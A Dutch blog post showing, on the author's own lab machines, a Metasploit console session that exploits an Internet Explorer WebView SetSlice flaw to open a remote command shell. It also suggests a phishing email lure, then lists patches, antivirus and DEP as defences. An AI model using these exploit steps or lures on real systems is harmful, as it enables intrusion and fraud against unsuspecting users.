hacken met metasploit

gebruik van metasploit framework om te zien of IE kwetsbaar is voor Webview SetSlice

Internet Explorer heeft nogal een historie van beveiligingslekken. Op het moment van schrijven zijn er nog 19 lekken waarvoor Microsoft nog geen patch heeft uitgebracht (zie Secunia).

Het is opvallend dat dit soort informatie mensen er niet van weerhoudt om de browser te gebruiken (er zijn veiligere alternatieven), de algemene tendens is dat het wel niet zo’n vaart zal lopen. Pas als je laat zien hoe makkelijk het is om misbruik te maken van een van die beveiligingslekken om een computer binnen te dringen en complete toegang te krijgen schrikt men. Dus toen onlangs een nieuwe 0-Day beveiligingslek voor Internet Explorer aan het licht kwam besloot ik om met mijn eigen computers een te kijken hoe makkelijk dit te gebruiken was om de Windows machine binnen te dringen. Ik heb hierbij gebruik gemaakt van het metasploit framework.

[ ~/metasploit]$ ./msfconsole

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|

       =[ msf v3.0-beta-dev
+ -- --=[ 104 exploits - 99 payloads
+ -- --=[ 17 encoders - 4 nops
       =[ 13 aux

msf > use windows/browser/webview_setslice
msf exploit(webview_setslice) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(webview_setslice) > exploit
[*] Started bind handler
[*] Using URL: http://10.10.10.6:8080/kYcv56MJDE3509LmnJK
[*] Server started.
[*] Exploit running as background job.
msf exploit(webview_setslice) >

Nu ga ik naar mijn Windows PC en open met IE de URL van hierboven:
http://10.10.10.6:8080/kYcv56MJDE3509LmnJK
IE lijkt nu te hangen op de PC alsof een trage pagina wordt geladen
in metasploit zie ik:

msf exploit(webview_setslice) > [*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.10.10.6:34745 -> 10.10.10.99:4444)

msf exploit(webview_setslice) > sessions -l

Active sessions
===============

    Id  Description    Tunnel
    --  -----------    ------
    1   Command shell  10.10.10.6:34745 -> 10.10.10.99:4444

msf exploit(webview_setslice) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\beekman\Desktop>cd \
cd \

C:\>netstat -an
netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    10.10.10.99:4444     10.10.10.6:34745   ESTABLISHED

C:\> ^C
Abort session 1? [y/N]  y

[*] Command shell session 1 closed.
msf exploit(webview_setslice) >

De payload bind_tcp is slechts een van de vele mogelijke payloads die je kan gebruiken, er zitten ook payloads bij die je een VNC connectie geven zodat je grafisch kan meekijken wat de gebruiker allemaal aan het doen is.

Je moet met deze specifieke exploit de gebruiker natuurlijk nog wel zo ver krijgen dat hij op jou URL klikt maar met een beetje social engineering hoeft dat geen probleem te zijn.
B.v. je stelt een e-mailtje op alsof je een nieuwe online muziekwinkel bent en de eerste 100 mensen die de nieuwe winkel bezoeken krijgen gratis een iPod, u kunt onze winkel vinden via onderstaande link.

Je kan jezelf beschermen tegen dit specifieke lek door de juiste Microsoft patch te installeren. Behalve dat is het ook slim om over te stappen naar een veiliger browser zoals b.v. firefox.

Andere middelen van beveiliging die kunnen helpen is het hebben van een goed en bijgewerkte AntiVirus op je computer. Bovenstaande exploit werd bijvoorbeeld door Symantec tegengehouden.
Als je een moderne CPU in je computer hebt is het zeker ook aan te raden om Data Execution Prevention kortweg DEP in te schakelen. Dit kan als volgt:

  1. Klik op Start, klik op Uitvoeren, typ sysdm.cpl en klik op OK.
  2. Open het tabblad Geavanceerd en klik onder Prestaties op Instellingen.
  3. Gebruik op het tabblad Preventie van gegevensuitvoering (DEP) een van de volgende procedures:
    • Klik op DEP alleen voor kritieke Windows-programma’s en -services inschakelen als u het OptIn-beleid wilt selecteren.
    • Klik op DEP voor alle programma’s en services inschakelen, behalve voor de hieronder geselecteerde als u het OptOut-beleid wilt selecteren. Klik vervolgens op Toevoegen om de programma’s toe te voegen waarvoor u de DEP-functie niet wilt gebruiken.
  4. Klik tweemaal op OK.

N.B.
Ik heb bovenstaande tests op mijn eigen computers uitgevoerd. Het inbreken op andermans computers is strafbaar volgens de Nederlandse Wet. Zelfs het voorhanden hebben van programma’s of andere middelen om te hacken is een strafbaar feit en kan bestraft worden met een celstraf van maximaal 1 jaar (zie: uitleg computervredebreuk ).